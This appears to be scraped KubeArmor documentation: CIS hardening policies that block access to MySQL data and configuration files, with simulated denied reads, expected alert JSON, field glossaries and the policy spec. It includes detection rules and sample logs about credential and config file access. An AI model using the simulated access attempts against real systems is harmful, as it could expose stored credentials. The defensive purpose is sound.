  • CIS Distribution Independent Linuxv2.0

  • Control-Id: 6.14.4

Policy

Database Access

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-mysql-dir
  namespace: wordpress-mysql
spec:
  message: Alert! Attempt to make changes to database detected
  tags:
  - CIS
  - CIS_Linux
  selector:
    matchLabels:
      app: mysql
  file:
    matchDirectories:
    - dir: /var/lib/mysql/
      ownerOnly: true
      readOnly: true
      severity: 1
      action: Block

Simulation

kubectl exec -it mysql-74775b4bf4-65nqf -n wordpress-mysql -- bash
root@mysql-74775b4bf4-65nqf:/# cd var/lib/mysql
root@mysql-74775b4bf4-65nqf:/var/lib/mysql# cat ib_logfile1
cat: ib_logfile1: Permission denied
root@mysql-74775b4bf4-65nqf:/var/lib/mysql#

Expected Alert

{
  "ATags": [
    "CIS",
    "CIS_Linux"
  ],
  "Action": "Block",
  "ClusterName": "aditya",
  "ContainerID": "b75628d4225b8071d5795da342cf2a5c03b1d67b22b40016697fcd17a0db20e4",
  "ContainerImage": "docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f1e9ba63dc7825ac20cb975e34cfcae",
  "ContainerName": "mysql",
  "Data": "syscall=SYS_OPEN flags=O_RDONLY",
  "Enforcer": "AppArmor",
  "HashID": "a7b7d91d52de395fe6cda698e89e0112e6f3ab818ea331cee60295a8ede358c8",
  "HostName": "aditya",
  "HostPID": 29898,
  "HostPPID": 29752,
  "Labels": "app=mysql",
  "Message": "Alert! Attempt to make changes to database detected",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "mysql",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 230,
  "PPID": 223,
  "PodName": "mysql-74775b4bf4-65nqf",
  "PolicyName": "ksp-block-mysql-dir",
  "ProcessName": "/bin/cat",
  "Resource": "/var/lib/mysql/ib_logfile1",
  "Result": "Permission denied",
  "Severity": "1",
  "Source": "/bin/cat ib_logfile1",
  "Tags": "CIS,CIS_Linux",
  "Timestamp": 1696322555,
  "Type": "MatchedPolicy",
  "UID": 0,
  "UpdatedTime": "2023-10-03T08:42:35.618890Z",
  "cluster_id": "3896",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "workload": "1"
}

References

Config data: Protect access to configuration data containing plain text credentials.

Description

Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.

Attack Scenario

In a possible attack scenario, an attacker may try to change the configurations to open websites to application security holes such as session hijacking and cross-site scripting attacks, which can lead to the disclosure of private data. Additionally, attackers can also leverage these changes to gather sensitive information. It's crucial to take proactive measures to prevent these attacks from occurring. Attack Type Cross-Site Scripting(XSS), Data manipulation, Session hijacking Actual Attack XSS attack on Fortnite 2019, Turla LightNeuron Attack

Compliance

  • CIS Distribution Independent Linuxv2.0

  • Control-Id: 6.16.14

Policy

Config data

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-stig-v-81883-restrict-access-to-config-files
  namespace: wordpress-mysql
spec:
  tags:
  - config-files
  message: Alert! configuration files have been accessed
  selector:
    matchLabels:
      app: wordpress
  file:
    matchPatterns:
    - pattern: /**/*.conf
      ownerOnly: true
  action: Block

Simulation

With a shell different than the user owning the file:

$ cat /etc/ca-certificates.conf                                                                                         
cat: /etc/ca-certificates.conf: Permission denied                                                                       
$                                                   

Expected Alert

{
  "Action": "Block",
  "ClusterName": "d3mo",
  "ContainerID": "548176888fca6bb6d66633794f3d5f9d54930a9d9f43d4f05c11de821c758c0f",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "ContainerName": "wordpress",
  "Data": "syscall=SYS_OPEN flags=O_RDONLY",
  "Enforcer": "AppArmor",
  "HostName": "master-node",
  "HostPID": 39039,
  "HostPPID": 38787,
  "Labels": "app=wordpress",
  "NamespaceName": "wordpress-mysql",
  "Operation": "File",
  "Owner": {
    "Name": "wordpress",
    "Namespace": "wordpress-mysql",
    "Ref": "Deployment"
  },
  "PID": 220,
  "PPID": 219,
  "ParentProcessName": "/bin/dash",
  "PodName": "wordpress-fb448db97-wj7n7",
  "PolicyName": "DefaultPosture",
  "ProcessName": "/bin/cat",
  "Resource": "/etc/ca-certificates.conf",
  "Result": "Permission denied",
  "Source": "/bin/cat /etc/ca-certificates.conf",
  "Timestamp": 1696485467,
  "Type": "MatchedPolicy",
  "UID": 1000,
  "UpdatedTime": "2023-10-05T05:57:47.935622Z",
  "cluster_id": "2302",
  "component_name": "kubearmor",
  "instanceGroup": "0",
  "instanceID": "0",
  "tenant_id": "167",
  "workload": "1"
}

References

KubeArmor supports configurable default security posture. The security posture could be allow/audit/deny. Default Posture is used when there's atleast one Allow policy for the given deployment i.e. KubeArmor is handling policies in whitelisting manner (more about this in ).

Note: This example is in the environment.

If you don't have access to a K8s cluster, please follow to set one up.

karmor CLI tool:

To deploy app follow

Ref:

Log field
Description
Example
Alert Field
Description
Example

For better understanding, you can check .

In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, the coverage of regular expressions is highly dependent on AppArmor (). Thus, we generally do not recommend using this match.

In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in .

The action could be Allow, Audit, or Block. Security policies would be handled in a blacklist manner or a whitelist manner according to the action. Thus, you need to define the action carefully. You can refer to for more details. In the case of the Audit action, we can use this action for policy verification before applying a security policy with the Block action. For System calls monitoring, we only support audit mode no matter what the action is set to.

MITRE T1528: Steal Application Access Token
Mitre-Techniques-T1565
PCI DSS and FIM
The biggest ransomware attacks in history
MITRE Installer Packages
Codecov Incident - A Supply Chain Attack
MITRE Subvert Trust Controls
MITRE Unsecured credentials
POODLE Attack
BEAST
MITRE Scan Databases
Yahoo Service Hacked
MITRE Unsecured credentials in files
Turla LightNeuron
MITRE Exfiltration
Darkbeams data breach
Shields Healthcare Group Data Breach
STIG no exec in /tmp
The biggest ransomeware attacks in history
Shields Healthcare Group Data Breach
MITRE ATT&CK execution in k8s
Target Data Breach
MITRE Network Service Discovery
MITRE Indicator Removal
MITRE Network Service Discovery
Considerations in Policy Action
multiubuntu
wordpress-mysql
this
Adversarial Attacks on Deep Learning Models
How to Protect ML Models Against Adversarial Attacks
Weaponizing ML Models with Ransomware
https://hiddenlayer.com/research/weaponizing-machine-learning-models-with-ransomware/#Pickle-Code-Injection-POC
this
Download and install karmor-cli

ClusterName

gives information about the cluster for which the log was generated

default

Operation

gives details about what type of operation happened in the pod

File/Process/ Network

ContainerID

information about the container ID from where log was generated

7aca8d52d35ab7872df6a454ca32339386be

ContainerImage

shows the image that was used to spin up the container

docker.io/accuknox/knoxautopolicy:v0.9@sha256:bb83b5c6d41e0d0aa3b5d6621188c284ea

ContainerName

specifies the Container name where the log got generated

discovery-engine

Data

shows the system call that was invoked for this operation

syscall=SYS_OPENAT fd=-100 flags=O_RDWR|O_CREAT|O_NOFOLLOW|O_CLOEXEC

HostName

shows the node name where the log got generated

aks-agentpool-16128849-vmss000001

HostPID

gives the host Process ID

967872

HostPPID

list the details of host Parent Process ID

967496

Labels

shows the pod label from where log generated

app=discovery-engine

Message

gives the message specified in the policy

Alert! Execution of package management process inside container is denied

NamespaceName

lists the namespace where pod is running

accuknox-agents

PID

lists the process ID running in container

1

PPID

lists the Parent process ID running in container

967496

ParentProcessName

gives the parent process name from where the operation happend

/usr/bin/containerd-shim-runc-v2

PodName

lists the pod name where the log got generated

mysql-76ddc6ddc4-h47hv

ProcessName

specifies the operation that happened inside the pod for this log

/knoxAutoPolicy

Resource

lists the resources that was requested

//accuknox-obs.db

Result

shows whether the event was allowed or denied

Passed

Source

lists the source from where the operation request came

/knoxAutoPolicy

Type

specifies it as container log

ContainerLog

{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000000",
  "NamespaceName": "default",
  "PodName": "vault-0",
  "Labels": "app.kubernetes.io/instance=vault,app.kubernetes.io/name=vault,component=server,helm.sh/chart=vault-0.24.1,statefulset.kubernetes.io/pod-name=vault-0",
  "ContainerID": "775fb27125ee8d9e2f34d6731fbf3bf677a1038f79fe8134856337612007d9ae",
  "ContainerName": "vault",
  "ContainerImage": "docker.io/hashicorp/vault:1.13.1@sha256:b888abc3fc0529550d4a6c87884419e86b8cb736fe556e3e717a6bc50888b3b8",
  "ParentProcessName": "/usr/bin/runc",
  "ProcessName": "/bin/sh",
  "HostPPID": 2514065,
  "HostPID": 2514068,
  "PPID": 2514065,
  "PID": 3552620,
  "UID": 100,
  "Type": "ContainerLog",
  "Source": "/usr/bin/runc",
  "Operation": "Process",
  "Resource": "/bin/sh -ec vault status -tls-skip-verify",
  "Data": "syscall=SYS_EXECVE",
  "Result": "Passed"
}
{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000000",
  "NamespaceName": "accuknox-agents",
  "PodName": "discovery-engine-6f5c4df7b4-q8zbc",
  "Labels": "app=discovery-engine",
  "ContainerID": "7aca8d52d35ab7872df6a454ca32339386be755d9ed6bd6bf7b37ec6aaf277e4",
  "ContainerName": "discovery-engine",
  "ContainerImage": "docker.io/accuknox/knoxautopolicy:v0.9@sha256:bb83b5c6d41e0d0aa3b5d6621188c284ea99741c3692e34b0f089b0e74745413",
  "ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
  "ProcessName": "/knoxAutoPolicy",
  "HostPPID": 967496,
  "HostPID": 967872,
  "PPID": 967496,
  "PID": 1,
  "Type": "ContainerLog",
  "Source": "/knoxAutoPolicy",
  "Operation": "File",
  "Resource": "/var/run/secrets/kubernetes.io/serviceaccount/token",
  "Data": "syscall=SYS_OPENAT fd=-100 flags=O_RDONLY|O_CLOEXEC",
  "Result": "Passed"
}
{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000001",
  "NamespaceName": "accuknox-agents",
  "PodName": "policy-enforcement-agent-7946b64dfb-f4lgv",
  "Labels": "app=policy-enforcement-agent",
  "ContainerID": "b597629c9b59304c779c51839e9a590fa96871bdfdf55bfec73b26c9fb7647d7",
  "ContainerName": "policy-enforcement-agent",
  "ContainerImage": "public.ecr.aws/k9v9d5v2/policy-enforcement-agent:v0.1.0@sha256:005c1fde3ff8a667f3ac7540c5c011c752a7e3aaa2c89aa335703289ed8d80f8",
  "ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
  "ProcessName": "/home/pea/main",
  "HostPPID": 1394403,
  "HostPID": 1394554,
  "PPID": 1394403,
  "PID": 1,
  "Type": "ContainerLog",
  "Source": "./main",
  "Operation": "Network",
  "Resource": "sa_family=AF_INET sin_port=53 sin_addr=10.0.0.10",
  "Data": "syscall=SYS_CONNECT fd=10",
  "Result": "Passed"
}

Action

specifies the action of the policy it has matched.

Audit/Block

ClusterName

gives information about the cluster for which the alert was generated

aks-test-cluster

Operation

gives details about what type of operation happened in the pod

File/Process/Network

ContainerID

information about the container ID where the policy violation or alert got generated

e10d5edb62ac2daa4eb9a2146e2f2cfa87b6a5f30bd3a

ContainerImage

shows the image that was used to spin up the container

docker.io/library/mysql:5.6@sha256:20575ecebe6216036d25dab5903808211f

ContainerName

specifies the Container name where the alert got generated

mysql

Data

shows the system call that was invoked for this operation

syscall=SYS_EXECVE

Enforcer

it specifies the name of the LSM that has enforced the policy

AppArmor/BPFLSM

HostName

shows the node name where the alert got generated

aks-agentpool-16128849-vmss000001

HostPID

gives the host Process ID

3647533

HostPPID

list the details of host Parent Process ID

3642706

Labels

shows the pod label from where alert generated

app=mysql

Message

gives the message specified in the policy

Alert! Execution of package management process inside container is denied

NamespaceName

lists the namespace where pod is running

wordpress-mysql

PID

lists the process ID running in container

266

PPID

lists the Parent process ID running in container

251

ParentProcessName

gives the parent process name from where the operation happend

/bin/bash

PodName

lists the pod name where the alert got generated

mysql-76ddc6ddc4-h47hv

PolicyName

gives the policy that was matched for this alert generation

harden-mysql-pkg-mngr-exec

ProcessName

specifies the operation that happened inside the pod for this alert

/usr/bin/apt

Resource

lists the resources that was requested

/usr/bin/apt

Result

shows whether the event was allowed or denied

Permission denied

Severity

gives the severity level of the operation

5

Source

lists the source from where the operation request came

/bin/bash

Tags

specifies the list of benchmarks this policy satisfies

NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4

Timestamp

gives the details of the time this event tried to happen

1687868507

Type

shows whether policy matched or default posture alert

MatchedPolicy

UpdatedTime

gives the time of this alert

2023-06-27T12:21:47.932526

cluster_id

specifies the cluster id where the alert was generated

596

component_name

gives the component which generated this log/alert

kubearmor

tenant_id

specifies the tenant id where this cluster is onboarded in AccuKnox SaaS

11

{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000001",
  "NamespaceName": "wordpress-mysql",
  "PodName": "wordpress-787f45786f-2q9wf",
  "Labels": "app=wordpress",
  "ContainerID": "72de193fc8d849cd052affae5a53a27111bcefb75385635dcb374acdf31a5548",
  "ContainerName": "wordpress",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "HostPPID": 495804,
  "HostPID": 495877,
  "PPID": 309835,
  "PID": 309841,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/usr/bin/apt",
  "PolicyName": "harden-wordpress-pkg-mngr-exec",
  "Severity": "5",
  "Tags": "NIST,NIST_800-53_CM-7(4),SI-4,process,NIST_800-53_SI-4",
  "ATags": [
    "NIST",
    "NIST_800-53_CM-7(4)",
    "SI-4",
    "process",
    "NIST_800-53_SI-4"
  ],
  "Message": "Alert! Execution of package management process inside container is denied",
  "Type": "MatchedPolicy",
  "Source": "/bin/bash",
  "Operation": "Process",
  "Resource": "/usr/bin/apt",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "AppArmor",
  "Action": "Block",
  "Result": "Permission denied"
}
{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000001",
  "NamespaceName": "wordpress-mysql",
  "PodName": "wordpress-787f45786f-2q9wf",
  "Labels": "app=wordpress",
  "ContainerID": "72de193fc8d849cd052affae5a53a27111bcefb75385635dcb374acdf31a5548",
  "ContainerName": "wordpress",
  "ContainerImage": "docker.io/library/wordpress:4.8-apache@sha256:6216f64ab88fc51d311e38c7f69ca3f9aaba621492b4f1fa93ddf63093768845",
  "HostPPID": 495804,
  "HostPID": 496390,
  "PPID": 309835,
  "PID": 309842,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/bin/rm",
  "PolicyName": "harden-wordpress-file-integrity-monitoring",
  "Severity": "1",
  "Tags": "NIST,NIST_800-53_AU-2,NIST_800-53_SI-4,MITRE,MITRE_T1036_masquerading,MITRE_T1565_data_manipulation",
  "ATags": [
    "NIST",
    "NIST_800-53_AU-2",
    "NIST_800-53_SI-4",
    "MITRE",
    "MITRE_T1036_masquerading",
    "MITRE_T1565_data_manipulation"
  ],
  "Message": "Detected and prevented compromise to File integrity",
  "Type": "MatchedPolicy",
  "Source": "/bin/rm /sbin/raw",
  "Operation": "File",
  "Resource": "/sbin/raw",
  "Data": "syscall=SYS_UNLINKAT flags=",
  "Enforcer": "AppArmor",
  "Action": "Block",
  "Result": "Permission denied"
}
{
  "ClusterName": "default",
  "HostName": "aks-agentpool-16128849-vmss000000",
  "NamespaceName": "default",
  "PodName": "vault-0",
  "Labels": "app.kubernetes.io/instance=vault,app.kubernetes.io/name=vault,component=server,helm.sh/chart=vault-0.24.1,statefulset.kubernetes.io/pod-name=vault-0",
  "ContainerID": "775fb27125ee8d9e2f34d6731fbf3bf677a1038f79fe8134856337612007d9ae",
  "ContainerName": "vault",
  "ContainerImage": "docker.io/hashicorp/vault:1.13.1@sha256:b888abc3fc0529550d4a6c87884419e86b8cb736fe556e3e717a6bc50888b3b8",
  "HostPPID": 2203523,
  "HostPID": 2565259,
  "PPID": 2203523,
  "PID": 3558570,
  "UID": 100,
  "ParentProcessName": "/usr/bin/containerd-shim-runc-v2",
  "ProcessName": "/bin/vault",
  "PolicyName": "ksp-vault-network",
  "Severity": "8",
  "Type": "MatchedPolicy",
  "Source": "/bin/vault status -tls-skip-verify",
  "Operation": "Network",
  "Resource": "domain=AF_UNIX type=SOCK_STREAM|SOCK_NONBLOCK|SOCK_CLOEXEC protocol=0",
  "Data": "syscall=SYS_SOCKET",
  "Enforcer": "eBPF Monitor",
  "Action": "Audit",
  "Result": "Passed"
}
{
  "Timestamp": 1692813948,
  "UpdatedTime": "2023-08-23T18:05:48.301798Z",
  "ClusterName": "default",
  "HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
  "HostPPID": 1979,
  "HostPID": 1787227,
  "PPID": 1979,
  "PID": 1787227,
  "ParentProcessName": "/bin/bash",
  "ProcessName": "/bin/sleep",
  "PolicyName": "sleep-deny",
  "Severity": "5",
  "Type": "MatchedHostPolicy",
  "Source": "/bin/bash",
  "Operation": "Process",
  "Resource": "/usr/bin/sleep 10",
  "Data": "syscall=SYS_EXECVE",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Permission denied"
}
{
  "Timestamp": 1692814089,
  "UpdatedTime": "2023-08-23T18:08:09.522743Z",
  "ClusterName": "default",
  "HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
  "HostPPID": 1791315,
  "HostPID": 1791316,
  "PPID": 1791315,
  "PID": 1791316,
  "UID": 204,
  "ParentProcessName": "/usr/sbin/sshd",
  "ProcessName": "/usr/sbin/sshd",
  "PolicyName": "DefaultPosture",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/sbin/sshd",
  "Operation": "Syscall",
  "Data": "syscall=SYS_SETGID userid=0",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Operation not permitted"
}
{
  "Timestamp": 1692814089,
  "UpdatedTime": "2023-08-23T18:08:09.523964Z",
  "ClusterName": "default",
  "HostName": "gke-my-first-cluster-1-default-pool-9144db50-81gb",
  "HostPPID": 1791315,
  "HostPID": 1791316,
  "PPID": 1791315,
  "PID": 1791316,
  "UID": 204,
  "ParentProcessName": "/usr/sbin/sshd",
  "ProcessName": "/usr/sbin/sshd",
  "PolicyName": "DefaultPosture",
  "Type": "MatchedHostPolicy",
  "Source": "/usr/sbin/sshd",
  "Operation": "Syscall",
  "Data": "syscall=SYS_SETUID userid=0",
  "Enforcer": "BPFLSM",
  "Action": "Block",
  "Result": "Operation not permitted"
}
apiVersion: security.kubearmor.com/v1
kind:KubeArmorPolicy
metadata:
  name: [policy name]
  namespace: [namespace name]

spec:
  severity: [1-10]                         # --> optional 
  tags: ["tag", ...]                       # --> optional
  message: [message]                       # --> optional

  selector:
    matchLabels:
      [key1]: [value1]
      [keyN]: [valueN]
    matchExpressions:
      - key: [label]
        operator: [In|NotIn]
        values:
          - [labels]

  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]              # --> optional

  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional

  network:
    matchProtocols:
    - protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
      fromSource:                          # --> optional
      - path: [absolute exectuable path]

  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
  
  syscalls:
    matchSyscalls:
    - syscall:
      - syscallX
      - syscallY
      fromSource:                            # --> optional
      - path: [absolute exectuable path]
      - dir: [absolute directory path]
        recursive: [true|false]              # --> optional
    matchPaths:
    - path: [absolute directory path | absolute exectuable path]
      recursive: [true|false]                # --> optional
      - syscall:
        - syscallX
        - syscallY
      fromSource:                            # --> optional
      - path: [absolute exectuable path]
      - dir: [absolute directory path]
        recursive: [true|false]              # --> optional

  action: [Allow|Audit|Block] (Block by default)
  apiVersion: security.kubearmor.com/v1
  kind:KubeArmorPolicy
  metadata:
    name: [policy name]
    namespace: [namespace name]
severity: [1-10]
tags: ["tag1", ..., "tagN"]
message: [message]
  selector:
    matchLabels:
      [key1]: [value1]
      [keyN]: [valueN]
  selector:
    matchExpressions:              
      - key: label
        operator: [In|NotIn]
        values:
        - [label]       # string format eg. -> (app=nginx)
  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]            # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]            # --> optional
  process:
    matchPaths:
    - path: /bin/sleep
      fromSource:
      - path: /bin/bash
  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute file path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]            # --> optional
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute file path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
  network:
    matchProtocols:
    - protocol: [protocol]               # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
      fromSource:                        # --> optional
      - path: [absolute file path]
  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                        # --> optional
      - path: [absolute file path]
syscalls:
  matchSyscalls:
  - syscall:
    - syscallX
    - syscallY
    fromSource:                            # --> optional
    - path: [absolute exectuable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
  matchPaths:
  - path: [absolute directory path | absolute exectuable path]
    recursive: [true|false]                # --> optional
    - syscall:
      - syscallX
      - syscallY
    fromSource:                            # --> optional
    - path: [absolute exectuable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
  process:
    matchPaths:
    - path: /bin/sleep
      - syscall:
        - unlink
      fromSource:
      - path: /bin/bash
  action: [Allow|Audit|Block]
KubeArmor Open Telemetry format
the KubeArmorPolicy spec diagram
Policy Core Reference
Capability List
Consideration in Policy Action
here
here
here

Cluster Policy Spec for Containers

Cluster Policy Specification

Here is the specification of a Cluster security policy.

apiVersion: security.kubearmor.com/v1
kind:KubeArmorClusterPolicy
metadata:
  name: [policy name]
  namespace: [namespace name]              # --> optional

spec:
  severity: [1-10]                         # --> optional 
  tags: ["tag", ...]                       # --> optional
  message: [message]                       # --> optional

  selector:
    matchExpressions:
      - key: [namespace|label]
        operator: [In|NotIn]
        values:
          - [namespaces|labels]

  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]              # --> optional

  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]               # --> optional
      ownerOnly: [true|false]              # --> optional

  network:
    matchProtocols:
    - protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
      fromSource:                          # --> optional
      - path: [absolute exectuable path]

  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                          # --> optional
      - path: [absolute exectuable path]
  
  syscalls:
    matchSyscalls:
    - syscall:
      - syscallX
      - syscallY
      fromSource:                            # --> optional
      - path: [absolute exectuable path]
      - dir: [absolute directory path]
        recursive: [true|false]              # --> optional
    matchPaths:
    - path: [absolute directory path | absolute exectuable path]
      recursive: [true|false]                # --> optional
      - syscall:
        - syscallX
        - syscallY
      fromSource:                            # --> optional
      - path: [absolute exectuable path]
      - dir: [absolute directory path]
        recursive: [true|false]              # --> optional

  action: [Allow|Audit|Block] (Block by default)

Note Please note that for system calls monitoring we only support audit action no matter what the value of action is

Policy Spec Description

Now, we will briefly explain how to define a cluster security policy.

Common

A cluster security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion would be the same in any security policies. In the case of metadata, you need to specify the names of a policy and a namespace where you want to apply the policy and kind would be KubeArmorClusterPolicy.

  apiVersion: security.kubearmor.com/v1
  kind:KubeArmorClusterPolicy
  metadata:
    name: [policy name]
    namespace: [namespace name]

Severity

The severity part is somewhat important. You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.

severity: [1-10]

Tags

The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.

tags: ["tag1", ..., "tagN"]

Message

The message part is optional. You can add an alert message, and then the message will be presented in alert logs.

message: [message]

Selector

In the selector section for cluster-based policies, we use matchExpressions to define the namespaces where the policy should be applied and labels to select/deselect the workloads in those namespaces. Currently, only namespaces and labels can be matched, so the key should be 'namespace' and 'label'. The operator will determine whether the policy should apply to the namespaces and its workloads specified in the values field or not. Both matchExpressions, namespace and label are an ANDed operation.

Operator: In When the operator is set to In, the policy will be applied only to the namespaces listed and if label matchExpressions is defined, the policy will be applied only to the workloads that match the labels in the values field.

Operator: NotIn When the operator is set to NotIn, the policy will be applied to all other namespaces except those listed in the values field and if label matchExpressions is defined, the policy will be applied to all the workloads except that match the labels in the values field.

  selector:
    matchExpressions:              
      - key: namespace
        operator: [In|NotIn]
        values:
        - [namespaces]
      - key: label
        operator: [In|NotIn]
        values:
        - [label]       # string format eg. -> (app=nginx)

TIP If the selector operator is omitted in the policy, it will be applied across all namespaces.

Process

  process:
    matchPaths:
    - path: [absolute executable path]
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute executable path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]            # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute exectuable path]
    matchPatterns:
    - pattern: [regex pattern]
      ownerOnly: [true|false]            # --> optional

In each match, there are three options.

  • ownerOnly (static action: allow owner only; otherwise block all)

    If this is enabled, the owners of the executable(s) defined with matchPaths and matchDirectories will be only allowed to execute.

  • recursive

    If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.

  • fromSource

    If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).

      process:
        matchPaths:
        - path: /bin/sleep
          fromSource:
          - path: /bin/bash

File

The file section is quite similar to the process section.

  file:
    matchPaths:
    - path: [absolute file path]
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute file path]
    matchDirectories:
    - dir: [absolute directory path]
      recursive: [true|false]            # --> optional
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional
      fromSource:                        # --> optional
      - path: [absolute file path]
    matchPatterns:
    - pattern: [regex pattern]
      readOnly: [true|false]             # --> optional
      ownerOnly: [true|false]            # --> optional

The only difference between 'process' and 'file' is the readOnly option.

  • readOnly (static action: allow to read only; otherwise block all)

    If this is enabled, the read operation will be only allowed, and any other operations (e.g., write) will be blocked.

Network

In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.

  network:
    matchProtocols:
    - protocol: [protocol]               # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
      fromSource:                        # --> optional
      - path: [absolute file path]

Capabilities

  capabilities:
    matchCapabilities:
    - capability: [capability name]
      fromSource:                        # --> optional
      - path: [absolute file path]

Syscalls

In the case of syscalls, there are two types of matches, matchSyscalls and matchPaths. matchPaths can be used to target system calls targeting specific binary path or anything under a specific directory, additionally you can slice based on syscalls generated by a binary or a group of binaries in a directory. You can use matchSyscall as a more general rule to match syscalls from all sources or from specific binaries.

syscalls:
  matchSyscalls:
  - syscall:
    - syscallX
    - syscallY
    fromSource:                            # --> optional
    - path: [absolute exectuable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional
  matchPaths:
  - path: [absolute directory path | absolute exectuable path]
    recursive: [true|false]                # --> optional
    - syscall:
      - syscallX
      - syscallY
    fromSource:                            # --> optional
    - path: [absolute exectuable path]
    - dir: [absolute directory path]
      recursive: [true|false]              # --> optional

There is one options in each match.

